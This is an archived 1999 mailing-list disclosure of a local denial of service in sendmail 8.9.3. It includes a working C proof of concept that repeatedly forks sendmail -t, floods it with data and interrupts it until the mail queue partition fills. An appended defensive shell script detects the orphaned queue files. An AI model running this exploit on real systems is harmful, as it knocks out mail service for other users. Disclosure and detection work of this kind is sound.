The OpenNET Project
 


Possible local DoS in sendmail


Date: Thu, 1 Apr 1999 14:00:16 +0000
From: Lukasz Luzar <[email protected]>
To: [email protected]
Subject: Possible local DoS in sendmail

Hi,
It seems that sendmail run with the -t option does NOT block SIGINT ...
If we press CTRL-C while we are sending data to its stdin, the process
is killed, but an unfinished letter remains in the queue.
It stays there quite long - long enough to fill up the partition on disk where
/var/spool/mqueue resides.
When that happens, sendmail doesn't allow new connections - so it is a kind
of DoS attack on this service.
It has been tested on all new versions of sendmail up to the current one (8.9.3).

Example ...

 --- CUT HERE ----
 #include <stdio.h>
 #include <unistd.h>
 #include <signal.h>
 #include <sys/wait.h>

 #define DELAY 5              /* time in seconds needed to reach
                                 MaxMessageSize limit */
 #define SM_PATH "/usr/sbin/sendmail -t"

 void main()
 {
 	FILE	*fd;
 	int	pid;

 	for(;;) {
 		if(( pid = fork()) == 0) {
 			setpgrp();
 			if(( fd = popen( SM_PATH, "w")) == NULL)
 				fprintf( stderr, "popen error\n");

 			for(;;) fputc( 'A', fd);
 		} else {
 			sleep( DELAY);
 			kill( (-1) * pid, SIGINT);
 			fprintf( stdout, "next\n");
 			wait( NULL);
 		}
 	}
 }
--- CUT HERE ---

Regards,

---
Lukasz Luzar                               K.K.I.
http://noname.kki.krakow.pl/           [email protected]
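
Added example, not part of the original post: a check an administrator could run to spot the leftover data files described above before they fill the queue partition. It assumes the classic queue layout in which each message has a data file `df<ID>` and a control file `qf<ID>` in the same directory, and that an interrupted submission leaves the `df` file without its `qf` partner; the function names and the 60-minute default are choices made for this example.

```shell
#!/bin/sh
# Report stale sendmail data files (df<ID>) that have no control file (qf<ID>).
# Assumption: df/qf pairs live side by side in the queue directory.

# list_orphans QUEUE_DIR MIN_AGE_MINUTES
# Prints "bytes path" for every df file older than MIN_AGE_MINUTES without
# a matching qf file. The age threshold matters: a message that is still
# being submitted also has a df file and no qf file yet.
list_orphans() {
    find "$1" -type f -name 'df*' -mmin +"$2" |
    while IFS= read -r df; do
        dir=${df%/*}        # directory holding the data file
        base=${df##*/}      # file name, e.g. dfAA00002
        id=${base#df}       # queue ID shared by the df/qf pair
        if [ ! -e "$dir/qf$id" ]; then
            printf '%s %s\n' "$(wc -c < "$df" | tr -d ' ')" "$df"
        fi
    done
}

# orphan_total QUEUE_DIR MIN_AGE_MINUTES
# Prints the total number of bytes held by orphaned data files.
orphan_total() {
    list_orphans "$1" "$2" | awk '{ sum += $1 } END { print sum + 0 }'
}

# When called with a queue directory, print the orphans and their total size.
if [ "$#" -gt 0 ]; then
    list_orphans "$1" "${2:-60}"
    echo "total bytes: $(orphan_total "$1" "${2:-60}")"
fi
```

Run it from cron against /var/spool/mqueue and alert when the total grows; per-user disk quotas or a separate partition for the queue limit how far a local user can push it.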
